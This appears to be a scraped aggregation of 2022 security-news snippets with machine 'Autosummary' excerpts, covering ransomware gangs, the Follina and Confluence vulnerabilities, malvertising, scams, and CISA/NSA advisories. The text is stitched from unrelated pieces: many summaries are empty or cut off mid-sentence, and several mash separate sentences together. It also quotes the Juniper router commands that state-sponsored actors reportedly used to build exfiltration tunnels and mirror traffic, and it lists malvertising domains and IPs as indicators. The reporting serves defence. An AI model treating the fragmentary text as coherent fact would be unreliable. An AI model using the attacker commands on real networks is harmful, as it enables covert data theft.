From there, attackers can execute files, spy on computer usage, change system configurations, and so on — all while being unseen. Additionally, applying in-depth insights from our proprietary Linking Engine remediation technology, Malwarebytes thoroughly and permanently removes both the infection and any malware artifacts, delivering lethal “one-and-done” remediation. Stop Linux malware from getting a hold on your organization It may be true that Linux is more secure than most other operating systems, but make no mistake — Linux malware exists, and can have devastating effects on SMBs. "Autosummary:
After stealing the credit card info (i.e., name, expiration month and year, card numbers), the malware will send it to command-and-control (C2) servers different than the ones the Emotet card stealer module. "Autosummary:
While the updates to Cuba ransomware did not change much in terms of overall functionality, we have reason to believe that the updates aim to optimize its execution, minimize unintended system behavior, and provide technical support to the ransomware victims if they choose to negotiate. "Autosummary:
This clipboard hijacking feature works with various cryptocurrency addresses, including those for Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, and Bitcoin Cash addresses. "Autosummary:
" The patches and the renewed interest in the zero-day bug follow active exploitation of the "Follina" remote code execution vulnerability by leveraging malware-laced Word documents that abuse the "ms-msdt:" protocol URI scheme. "Autosummary:
" Widely exploited, federal agencies ordered to mitigate Since it was disclosed as an actively exploited zero-day bug last week by cybersecurity firm Volexity, CISA has ordered federal agencies to block all internet traffic to Confluence servers on their networks. "Autosummary:
Some of the URLs used in the phishing campaign (PIXM) After discovering that they could gain unauthenticated access to the phishing campaign stats pages, the researchers found that in 2021, 2.7 million users had visited one of the phishing portals. "We catch up with some old acquaintances that just aren"t ready to hang up the towel just yet.
The post MakeMoney malvertising campaign adds fake update template appeared first on Malwarebytes Labs.
"Autosummary:
188.227.107.121 188.227.107.92 Domains (malvertising domains, gates) adcashtds2[.]xyz adcashtdssystem[.]site adsinside[.]xyz adsterramagic[.]me adstexx[.]xyz allmagnew[.]xyz alltomag[.]xyz an-era[.]shop ankgomag[.]xyz anklexit[.]online ankltrafficexit[.]xyz ankmagicgo[.]xyz blackexit[.]xyz ccgmaining[.]life ccgmaining[.]live ccgmaining[.]work clickadusweep[.]vip clickadusweeps[.]vip clickadutds[.]xyz clicksdeliveryserver[.]space clicktds2[.]xyz cryptomoneyinside[.]xyz cryptomoneyinsider[.]biz cryptomoneyinsider[.]link cryptomoneyinsider[.]site cryptomoneyinsider[.]work cryptomoneyinsiders[.]com cryptomoneyinsiders[.]site cryptomoneyinsiders[.]work cryptomoneytds[.]xyz cryptopaycard[.]shop cryptosuite[.]pro cryptosuitetds[.]com cryptotraffic[.]vip cryptotraffictds[.]online cryptotraffictdss[.]xyz cryptozerotds[.]xyz daiichisankyo-hc[.]live earncryptomoney[.]info exitmagall[.]xyz extradeliverytraffic[.]com extramoneymaker[.]vip familylabs[.]xyz fujimi[.]fun gettime[.]xyz hilldeliveryexit[.]xyz hillex[.]xyz hilllandings[.]xyz hillmag[.]xyz hillmagnew[.]xyz hilltopmagic[.]xyz hilltoptds[.]xyz hilltoptdsserver[.]xyz hilltoptdsservers[.]fun hilltoptrafficdelivery[.]com hilltoptrafficdelivery[.]xyz jillstuart-floranotisjillstu[.]art k-to-kd[.]me keitarotrafficdelivery[.]com keitarotrafficdelivery[.]xyz lahsahal[.]site magcheckall[.]me magicadss[.]xyz magicadsterra[.]xyz magicclickadu[.]xyz magickhill[.]xyz magickpeoplenew[.]xyz magicpopcash[.]xyz magicpropeller[.]xyz magicself[.]xyz magiczero[.]xyz makemoneyeazzywith[.]me makemoneynowwith[.]me makemoneywith[.]us makemoneywithus[.]work mizuno[.]casa money365[.]xyz myallexit[.]xyz myjobsy[.]com nawa-store[.]com newallfrommag[.]xyz newzamenaadc[.]xyz newzamenaclick[.]xyz newzamenaself[.]xyz newzamenazero[.]xyz nippon-mask[.]site northfarmstock[.]xyz offers[.]myjobsy[.]com offersstudioex[.]live openphoto[.]xyz partners[.]usemoney[.]xyz prelandingpages[.]xyz promodigital[.]me propellermagic[.]xyz sberbank[.]hourscareer[.]com sberjob[.]hourscareer[.]com selfadtracker1[.]online selfadtrackerexit[.]xyz selftraffictds[.]xyz selfyourads[.]xyz shop[.]mizuno[.]casa supersports[.]fun surprise[.]yousweeps[.]vip tracker[.]usemoney[.]xyz traffic[.]selfadtracker1[.]online traffic[.]usemoney[.]xyz trafficdeliveryclick[.]xyz trafficdeliveryoffers[.]com trafficdeliverysystem[.]world traffictrackerself[.]xyz tryphoto[.]xyz trytime[.]xyz usehouse[.]xyz usemoney[.]life usemoney[.]xyz ymalljp[.]com yousweeps[.]vip zamenaad[.]xyz zamenaclick[.]xyz zamenahil[.]xyz zamenazer[.]xyz zapasnoiadc[.]xyz zapasnoiclick[.]xyz zapasnoiself[.]xyz zapasnoizero[.]xyz zermag[.]xyz zernewmagcheck[.]xyz zerocryptocard[.]shop zeroexit[.]xyz zerok2exit[.]xyz zeroparktraffic[.]xyz zeroparktrakeroutside[.]shop zerotdspark[.]space zerotracker[.]shop References https://twitter.com/MBThreatIntel/status/1483235125827571715 https://twitter.com/MBThreatIntel/status/1361824286499950601 https://twitter.com/malware_traffic/status/1412128664721014785 https://twitter.com/malware_traffic/status/1357513424566124548 https://twitter.com/FaLconIntel/status/1351739449932083200 https://twitter.com/tkanalyst/status/1226125887256416256 https://twitter.com/david_jursa/status/1346562997305696262 https://twitter.com/nao_sec/status/1334289601125445633 https://twitter.com/FaLconIntel/status/1298661757943087105 https://twitter.com/nao_sec/status/1294871134001799168 https://twitter.com/david_jursa/status/1232996830520193024 https://twitter.com/david_jursa/status/1229354505583628288 https://twitter.com/nao_sec/status/1211975197219151876 "0patch researchers released an unofficial security patch for a Windows zero-day vulnerability dubbed DogWalk. 0patch released an unofficial security patch for a new Windows zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT) dubbed DogWalk. The issue impacts all Windows versions, starting from Windows 7 and Server Server 2008, including the latest releases. The flaw […]
The post 0Patch released unofficial security patch for new DogWalk Windows zero-day appeared first on Security Affairs.
"Autosummary:
“During this process, it enumerates files in attacker’s folder, gets the file name for each of them, then glues together the local temporary path and that file name to generate the local path on the computer where the file is to be created.” "Autosummary:
Emsisoft CTO Fabian Wosar has previously told BleepingComputer that other ransomware gangs (besides the ones we reported on), including Babuk, RansomExx/Defray, Mespinoza, GoGoogle, Snatch, PureLocker, and DarkSide, have also developed and used their own Linux encryptors. "Autosummary:
"Autosummary:
Mandiant said it noted further similarities between UNC2165 and an Evil Corp-connected cyber espionage activity tracked by Swiss cybersecurity firm PRODAFT under the name SilverFish aimed at government entities and Fortune 500 companies in the E.U and the U.S. A successful initial compromise is followed by a string of actions as part of the attack lifecycle, including privilege escalation, internal reconnaissance, lateral movement, and maintaining long-term remote access, before delivering the ransomware payloads. "Autosummary:
"Autosummary:
Proofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and “steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.” "Autosummary:
A day later, Atlassian released an update that fixes the following versions of the affected products: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1; it’s also strongly recommending that customers update as soon as they can. "Mandiant researchers associate multiple LockBit ransomware attacks with the notorious Evil Corp Cybercrime Group. Mandiant researchers have investigated multiple LOCKBIT ransomware attacks that have been attributed to the financially motivated threat actor UNC2165. The researchers also noticed that the group shares numerous overlaps with the cybercrime gang Evil Corp. The UNC2165 group has been active since at […]
The post Evil Corp gang starts using LockBit Ransomware to evade sanctions appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The QBot malware operation has partnered with Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation. Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack […]
The post Black Basta ransomware operators leverage QBot for lateral movements appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Ransomware affiliates linked to multiple Ransomware as a Service (RaaS) operations (including REvil, PwndLocker, Egregor, ProLock, and MegaCortex) have also used Qbot for initial access into corporate networks. "The Ransomware Task Force"s five priority recommendations, issued last year, have all seen encouraging progress from governments.
The post Ransomware Task Force priorities see progress in first year appeared first on Malwarebytes Labs.
"Autosummary:
In June 2021, Ukrainian law enforcement worked with investigators from South Korea to arrest members affiliated with the Clop ransomware gang, and months later, members of the FBI, the French National Gendarmerie, and the Ukrainian National Police arrested two individuals—and seized about $2 million—from an unnamed ransomware group. “I can see the US government trying to, internationally, build a collation of countries—not just US agencies, but multiple agencies across multiple jurisdictions at the same time,” Daniels said. "Autosummary:
The functions supported by SVCReady at this time are the following: Download a file to the infected client Take a screenshot Run a shell command Check if it is running in a virtual machine Collect system information (a short and a "normal" version) Check the USB status, i.e., the number of devices plugged-in Establish persistence through a scheduled task Run a file Run a file using RunPeNative in memory Finally, the malware can also fetch additional payloads. "Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
For more information on PRC state-s "
Autosummary:
set forwarding-options port-mirroring family inet output no-filter-check set interfaces <interface-id> unit <unit number> family inet filter input <filter name> set interfaces <interface-id> unit <unit number> family inet filter output <filter name> Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection. While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network: set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value> set chassis network-services all-ethernet set interfaces <interface-id> unit <unit number> tunnel source <local network IP address> Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors Vendor CVE Vulnerability Type Cisco CVE-2018-0171 Remote Code Execution CVE-2019-15271 RCE CVE-2019-1652 RCE Citrix CVE-2019-19781 RCE DrayTek CVE-2020-8515 RCE D-Link CVE-2019-16920 RCE Fortinet CVE-2018-13382 Authentication Bypass MikroTik CVE-2018-14847 Authentication Bypass Netgear CVE-2017-6862 RCE Pulse CVE-2019-11510 Authentication Bypass CVE-2021-22893 RCE QNAP CVE-2019-7192 Privilege Elevation CVE-2019-7193 "Autosummary:
Unnoficial patches available for affected Windows systems Until Microsoft releases official security updates to address this zero-day bug, the 0patch micropatching service has developed free and unofficial patches for most affected Windows versions: Windows 11 v21H2 Windows 10 (v1803 to v21H2) Windows 7 Windows Server 2008 R2 "Give employees the knowledge needed to spot the warning signs of a cyberattack and to understand when they may be putting sensitive data at risk
The post Cybersecurity awareness training: What is it and what works best? appeared first on WeLiveSecurity
"Autosummary:
Among the areas to cover could be: Social engineering and phishing/vishing/smishing Accidental disclosure via email Web protection (safe searching and use of public Wi-Fi) Password best practices and multi-factor authentication Safe remote and home working How to spot insider threats Above all, bear in mind that lessons should be: Fun and gamified (think positive reinforcement rather than fear-based messages) Based around real-world simulation exercises Run continuously throughout the year in short lessons (10-15 minutes) Inclusive of every staff member including executives, part-timers and contractors Able to generate results which can be used to adjust programs to suit individual needs Tailored to suit different roles Once all this is decided, it’s important to find the right training provider. Ultimately, a serious security breach, whether resulting from third-party attack or an accidental data disclosure, could result in major financial and reputational damage. "Fraudulent donation sites using our sympathy for Ukraine seem to be on the rise. Know how to protect yourself!
The post FBI warns of scammers soliciting donations for Ukraine appeared first on Malwarebytes Labs.
"Autosummary:
Days before May, our Threat Intelligence team spotted a fake USA for UNHCR (United Nations High Commission for Refugees) website, which was part of a phishing campaign that started as a spam email using a spoofed address, calling on recipients to donate to Ukraine. "Autosummary:
Of the 639 apps tracked, 121 are based in the U.S., followed by the U.K. (55), Italy (43), Turkey (34), Australia (33), France (31), Spain (29), and Portugal (27). "Autosummary:
"Prometheus ransomware contained a weak random number generator that inspired researchers to try and build a one-size-fits-all decryptor.
The post RSA 2022: Prometheus ransomware’s flaws inspired researchers to try to build a near-universal decryption tool appeared first on Malwarebytes Labs.
"Autosummary:
Prometheus—a ransomware build based on Thanos that locked up victims’ computers in the summer of 2021—included a major “vulnerability” that led security researchers at IBM to try and build a one-size-fits-all ransomware decryptor that could work against multiple ransomware variants, including Prometheus, AtomSilo, LockFile, Bandana, Chaos, and PartyTicket. "Autosummary:
"LockBit ransomware gang claims to have hacked the cybersecurity firm Mandiant, which is investigating the alleged security breach. Today the LockBit ransomware gang has added the cybersecurity firm Mandiant to the list of victims published on its darkweb leak site. Mandiant is investigating the claims of the ransomware gang, the cybercrime group declared to have […]
The post Lockbit ransomware gang claims to have hacked cybersecurity giant Mandiant appeared first on Security Affairs.
"Autosummary:
"A nation-state actor is attempting to exploit the Follina flaw in a recent wave of attacks against government entities in Europe and the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. On May 31, Microsoft released […]
The post Another nation-state actor exploits Microsoft Follina to attack European and US entities appeared first on Security Affairs.
"Autosummary:
the U.S. An alleged nation-state actor is attempting to exploit the recently disclosed Microsoft Office Follina vulnerability in attacks aimed at government entities in Europe and the U.S. On May 31, Microsoft released workarounds for a recently discovered zero-day vulnerability, dubbed Follina and tracked as CVE-2022-30190 (CVSS score 7.8), in the Microsoft Office productivity suite. "Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups conducted by a new group called “Cyber Spetsnaz”. Resecurity, Inc. (USA) has identified an increase in activity within hacktivist groups, they’re leveraging current geopolitical tensions between the Ukraine and Russia to perform cyber-attacks. Following the attacks of the Killnet Collective, the group responsible […]
The post Exclusive: Pro-Russia group ‘Cyber Spetsnaz’ is attacking government agencies appeared first on Security Affairs.
"Autosummary:
Other divisions involved in the DDoS attacks included “Vera”, “FasoninnGung”, “Mirai”, “Jacky”, “DDOS Gung” and “Sakurajima” who previously attacked multiple WEB-resources in Germany. Around April time, “Cyber Spetsnaz” built one its first divisions called “Zarya”, they looked for experienced penetration testers, OSINT specialists, and hackers: Around this time the group performed one of their first coordinated attacks against NATO. "Proof-of-concept exploits for the critical CVE-2022-26134 vulnerability in Atlassian Confluence and Data Center servers are available online. Proof-of-concept exploits for the critical CVE-2022-26134 flaw, affecting Atlassian Confluence and Data Center servers, have been released. Bleeping Computer reported that starting from Friday afternoon, a proof-of-concept exploit for this issue was publicly shared. Researchers from cybersecurity firm […]
The post PoC exploits for Atlassian CVE-2022-26134 RCE flaw released online appeared first on Security Affairs.
"Autosummary:
Atlassian on Friday released security fixes to address the CVE-2022-26134 vulnerability in the following versions of the software: 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 IoT search engine Censys has found around 9,325 services across 8,347 distinct hosts running some version of Atlassian Confluence.Because you should apply a trial license from Atlassian😂#vulhub pic.twitter.com/CS1EVOHbKg — Phith0n (@phithon_xg) June 4, 2022 Early this week, Atlassian warned of a critical unpatched remote code execution vulnerability affecting all Confluence Server and Data Center supported versions, tracked as CVE-2022-26134, that is being actively exploited in attacks in the wild. "Autosummary:
"Autosummary:
"May 2022 saw the continued dominance of LockBit, and a possible disbursement of the Conti gang into other ransomware groups.
The post Ransomware: May 2022 review appeared first on Malwarebytes Labs.
"Autosummary:
Known ransomware attacks by group, May 2022 Known ransomware attacks by country, May 2022 Known ransomware attacks by industry, May 2022 Ransomware mitigations Source: IC3.gov Implement regular backups of all data to be stored as air-gapped, password-protected copies offline.It has been involved in hundreds of attacks, including the horrific disabling of Ireland’s Health Service Executive, and according to the FBI, it is “the costliest strain of ransomware ever documented”, having raked in over $150 million in ransom payments. Although LockBit remained the most widely-deployed ransomware in May 2022, it was, typically, Conti that sucked all of the air out of the room. "A vulnerability in Atlassian Confluence was found by performing an incident response investigation on a compromised server. The vulnerability is not yet patched.
The post [updated]Unpatched Atlassian Confluence vulnerability is actively exploited appeared first on Malwarebytes Labs.
"Autosummary:
Update June 3, 2022 Atlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. Note: ${ is the first part of a parameter substitution in a shell script Affected versions All supported versions of Confluence Server and Data Center are affected. "Autosummary:
"Autosummary:
"Autosummary:
"Behinder provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike," the researchers said. "Autosummary:
"Autosummary:
"Autosummary:
According to Verizon, 82% of this year’s data breaches involved the “human element” – “the Use of stolen credentials, Phishing, Misuse, or simply an Error.” In general, the results of DBIR merely confirm well-established trends, such as the growing threats of ransomware – up 13% this year – and the inescapability of the “human element”, which was tied to 82% of all breaches. "Autosummary:
“For cybercriminals, it’s a similar concept,” observed James McQuiggan, security awareness advocate at security firm KnowBe4, said in an email to Threatpost. "Malwarebytes DNS Filtering is a new module that helps block access to malicious websites and limit threats introduced by suspicious content.
The post Introducing Malwarebytes DNS Filtering module: How to block sites and create policy rules appeared first on Malwarebytes Labs.
"Autosummary:
Table of Contents Part 1: Accessing the module Once you add DNS filtering to your Nebula subscription, you can access the DNS filtering page on the left hand navigation. "Somerset County in New Jersey has been sent back to 1977 after a ransomware attack shut down various historical record checks.
The post Ransomware attack turns 2022 into 1977 for Somerset County appeared first on Malwarebytes Labs.
"Autosummary:
To ensure residents can reach the County we have created temporary Gmail addresses for the public to use to reach critical departments such as the County Commissioners, Health, Emergency Operations, the County Clerk, Sheriff, and Surrogate.Somerset County, New Jersey, has been hit so hard by a network assault that they’ve ended up in the direst straits imaginable, with county databases unavailable to provide information on land records and probate records, and with title searches only available for paper records that were entered before 1977.Somerset County Clerk and Surrogate services that depend on access to county databases are temporarily unavailable, such as land records, vital statistics, and probate records. Good news and bad news… Somerset County have confirmed the following: An upcoming Primary Election is unaffected as voting machines are “never connected to the county system.”Posted: June 1, 2022 by Somerset County in New Jersey has been sent back to 1977 after a ransomware attack shut down various historical record checks. "Autosummary:
"Autosummary:
Diligence & Awareness The most important takeaway from this ransomware evolution is that organizations with business connections to a breached organization, such as the ADA in this scenario, should be closely monitoring official update channels, identifying what (if any) of their own data may be at risk, and focus on threat-informed defensive measures.When a compromise takes place, the opportunity for “pay-for-decrypt” profits, as well as data or credential/access resale, leads to double- or triple-extortion ransomware. Facing the Future With the evolution of the strategy and tactics used by ransomware actors, it is essential that organizations have a big-picture perspective for defense, detection, and response and recovery. In May of 2021, Ireland’s public health system, the Health Service Executive, was victimized by a ransomware attack that had significant reverberations.” "Robocalls and scam calls have been a longstanding problem. For 2021, the FTC has recorded its highest number of victims yet.
The post More than a quarter of Americans fell for robocall scam calls in past year appeared first on Malwarebytes Labs.
"Autosummary:
According to the latest report from Truecaller (Google Docs upload of the entire report, separate blog here), a known spam blocker and caller ID app, 68.4 million Americans were victimized in the last 12 months, a substantial increase from the 59.4 million victims tallied up in 2021. "For industrial applications, the Internet of Things risks becoming the Internet of Thieves. Perhaps industries making use of connected solutions should take a leaf out the Apple book and lock down their infrastructure.
As digital processes become deeply embedded across every industry, it makes sense that industrial control systems were tested at this year’s Pwn2Own contest. Hackers were asked to seek out vulnerabilities in industrial software and systems.
Contest winners Daan Keuper and Thijs Alkemade found that once they managed to break into the IT networks used at these companies, it was “relatively easy” to then cause havoc with systems and equipment.
Autosummary:
IT understands this, of course, which is why industrial IoT deployments tend to secure the IT networks they use, but this also means that if those networks are penetrated, much of the deployed equipment lacks additional protection. Louis Priem, consultant at ICT Group, said, “Systems in factory environments typically run 24/7, so there is very little opportunity to patch vulnerabilities. "Autosummary:
The vulnerability, which is dubbed “Follina” and appears to exploit how Office products work with MSDT (Microsoft Diagnostics Tool), was initially brought to the public’s attention by Japanese security researchers on Twitter three days ago, and can be exploited even if macros are disabled in Microsoft Office. "As with everything digital, there"s someone, somewhere devising a method to steal the assets away from their rightful owners
The post Scams targeting NFT investors – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"New and exacerbated cyber-risks following Russia’s invasion of Ukraine are fueling a new urgency towards enhancing resilience
The post Cybersecurity: A global problem that requires a global answer appeared first on WeLiveSecurity
"Autosummary:
In parallel, Garth suggests involving organizations such as the UN, OECD and groups like the G7, G20 dynamically, so that “the international community shines a spotlight on state cyberactivity, calling out and taking action where necessary against those that ignore established norms and cracking down on criminal groups and their ability to monetize their criminal endeavors … but also works together to enhance cyber-resilience across the globe, including in developing countries”. Getting everyone to work together is the real challenge Governments don’t have an easy job, maintaining legacy systems, tackling skills shortage, building cyberawareness in the workplace, managing an expanding attack surface area, integrating new technologies, and facing down sophisticated attacks.While its exact role and structure are still being decided, it is expected to have an operational character that ensures a better exchange of intelligence on cybersecurity threats among the Member States, the European Commission, ENISA, CERT-EU, and the private sector. "Autosummary:
Like most other ransomware, GoodWill encrypts the usual file types – documents, databases, photographs, and videos – locking away your content. The second requested act involves taking five poor children (under the age of 13) to Dominos, Pizza Hut, or KFC, and allow them to order any food that they wish. "Autosummary:
"As NFTs exploded in popularity, scammers also jumped on the hype. Watch out for counterfeit NFTs, rug pulls, pump-and-dumps and other common scams plaguing the industry.
The post Common NFT scams and how to avoid them appeared first on WeLiveSecurity
"Autosummary:
Like pump-and-dump scams, the scammers will hype up a project, solicit investment and, without notice, abandon it.Wtf?#nft #arttheft #opensea #infringement #nftcommunity pic.twitter.com/LY5Jxb2N2r — Aja Trier (@AjaArt) January 5, 2022 NFT safety tips There are many scams to be aware of when diving into the NFT world and, as usual, scammers never pass up a golden money-making opportunity. a lot of these huge NFT "sales" are people selling it to themselves as part of either a pump and dump or a money laundering scheme https://t.co/s5QIIKhUL3 — Robert Evans (The Only Robert Evans) (@IwriteOK) October 29, 2021 On the buyer’s side, this scheme seems to be validated by influencers who share the NFT on their profiles, making it seem like a great opportunity.According to OpenSea, the biggest NFT marketplace, more than 80% of NFTs created for free on its platform were fake, plagiarized from other artists, or spam.🦁👑 (@LazyLionsNFT) May 18, 2022 Once a user tries to access the fake offer, they are requested to insert their passwords or personal information, giving away their details and getting nothing in return. "Autosummary:
"Autosummary:
"Actions for administrators to take today:
• Do not expose management interfaces to the internet.
• Enforce multi-factor authentication.
• Consider using CISA’s Cyber Hygiene Services.
The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2022-1388. This recently disclosed vulnerability in certain versions of F5 Networks, Inc., (F5) BIG-IP enables an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses. F5 released a patch for CVE-2022-1388 on May 4, 2022, and proof of concept (POC) exploits have since been publicly released, enabling less sophisticated actors to exploit the vulnerability. Due to previous exploitation of F5 BIG-IP vulnerabilities, CISA and MS-ISAC assess unpatched F5 BIG-IP devices are an attractive target; organizations that have not applied the patch are vulnerable to actors taking control of their systems.
According to public reporting, there is active exploitation of this vulnerability, and CISA and MS-ISAC expect to see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks. CISA and MS-ISAC strongly urge users and administrators to remain aware of the ramifications of exploitation and use the recommendations in this CSA—including upgrading their software to fixed versions—to help secure their organization’s systems against malicious cyber operations. Additionally, CISA and MS-ISAC strongly encourage administrators to deplo "
Autosummary:
"Best Practices to Protect Your Systems:
• Control access.
• Harden Credentials.
• Establish centralized log management.
• Use antivirus solutions.
• Employ detection tools.
• Operate services exposed on internet-accessible hosts with secure configurations.
• Keep software updated.
Cyber actors routinely exploit poor security configurations (either misconfigured or left unsecured), weak controls, and other poor cyber hygiene practices to gain initial access or as part of other tactics to compromise a victim’s system. This joint Cybersecurity Advisory identifies commonly exploited controls and practices and includes best practices to mitigate the issues. This advisory was coauthored by the cybersecurity authorities of the United States,[1],[2],[3] Canada,[4] New Zealand,[5],[6] the Netherlands,[7] and the United Kingdom.[8]
Download the PDF version of this report (pdf, 430kb).
Malicious actors commonly use the following techniques to gain initial access to victim networks.[TA0001]
Autosummary:
Additional Resources References [1] United States Cybersecurity and Infrastructure Security Agency [2] United States Federal Bureau of Investigation [3] United States National Security Agency [4] Canadian Centre for Cyber Security [5] New Zealand National Cyber Security Centre [6] New Zealand CERT NZ [7] Netherlands National Cyber Security Centre [8] United Kingdom National Cyber Security Centre [9] White House Executive Order on Improving the Nation’s Cybersecurity [10] NCSC-NL Factsheet: Prepare for Zero Trust [11] NCSC-NL Guide to Cyber Security Measures [12] N-able Blog: Intrusion Detection System (IDS): Signature vs. Anomaly-Based [13] NCSC-NL Guide to Cyber Security Measures [14] National Institute of Standards and Technology SP 800-123 – Keeping Servers Secured Contact U.S. organizations: To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. Purpose This document was developed by CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.This advisory was coauthored by the cybersecurity authorities of the United States,[ 1 ],[ 2 ],[ 3 ] Canada,[ 4 ] New Zealand,[ 5 ],[ 6 ] the Netherlands,[ 7 ] and the United Kingdom.CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring. Control Access Adopt a zero-trust security model that eliminates implicit trust in any one element, node, or service, and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.[9],[10] Zero-trust architecture enables granular privilege access management and can allow users to be assigned only the rights required to perform their assigned tasks.Where MFA is not implemented, enforce a strong password policy alongside other attribute-based information, such as device information, time of access, user history, and geolocation data. "Autosummary:
"The decision to release a ransomware decryptor involves a delicate balancing act between helping victims recover their data and alerting criminals to errors in their code
The post The downside of ‘debugging’ ransomware appeared first on WeLiveSecurity
"Autosummary:
These decisions are based on a careful assessment of many factors, such as how prolific the ransomware is, its severity, how quickly the ransomware authors patch coding bugs and flaws in their own software, and so forth. Dealing with ransomware, both its operators and the ransomware code itself, is a tricky process, and it is often a game of chess that can take weeks or months or even years to play out as the good guys battle the bad guys.They can recommend, assist with the process of incident response, and perhaps, send their support, but that is also reactive and offers little comfort to a freshly gutted business. "Can you spot the tell-tale signs of a phishing attempt and check if an email that has landed in your inbox is legit?
The post How to spot and avoid a phishing attack – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"The ‘it won’t happen to me’ mindset leaves you unprepared – here are some common factors that put any of us at risk of online fraud
The post 10 reasons why we fall for scams appeared first on WeLiveSecurity
"Autosummary:
The more venues we use to enjoy the advantages of the internet, the more opportunities for fraudsters to explore and exploit, be it for inheritance scams, various types of shopping cons, bogus job offers, fake sweepstakes and lotteries, and even dating fraud, to name just some of the most common scams doing the rounds. Scammers have “empathy” If you happen to interact with, say, a romance scammer, typically via messages, they may spend a while grooming you to gain your trust, making you feel understood and even test how far they can go with you. Our digital “breadcrumbs” are used against us Some scammers will use all available and seemingly harmless data about you to their advantage, watching your every move online, typically on social media, in order to eventually exploit your digital footprint. "Autosummary:
Lincoln College explained that it had managed to survive multiple catastrophes and challenges, including economic crises, a major campus fire, the Spanish flu epidemic of 1918, the Great Depression, World War II, the 2008 global financial crisis, but this time it was different. "What can organizations do to capitalize on the current fluidity in the job market in order to bring fresh cybersecurity talent into the fold?
The post Opportunity out of crisis: Tapping the Great Resignation to close the cybersecurity skills gap appeared first on WeLiveSecurity
"Autosummary:
Ten things spring to mind: Don’t focus just on accreditations, certifications and university degrees, but consider actual experience and appetite to learn Retrain those HR algorithms to ensure they’re not unduly filtering out potentially suitable candidates Change the hiring culture to one where there’s more focus on training candidates on the job Appeal to talent inside the organization in adjacent departments such as IT Reach out to talent outside the organization, in roles including mathematics, database management, and even former military operatives Offer improved support for single parents and mums returning to work after having a child.According to the (ISC)² report, the top consequences of staff shortages are: Misconfigured systems (32%) Not enough time for proper risk assessments (30%) Slow patching of critical systems (29%) Oversights in process and procedure (28%) There are ways to mitigate the shortfall in talent. "LinkedIn scammers attack when we may be at our most vulnerable – here’s what to look out for and how to avoid falling victim to fraud when using the platform
The post Common LinkedIn scams: Beware of phishing attacks and fake job offers appeared first on WeLiveSecurity
"Autosummary:
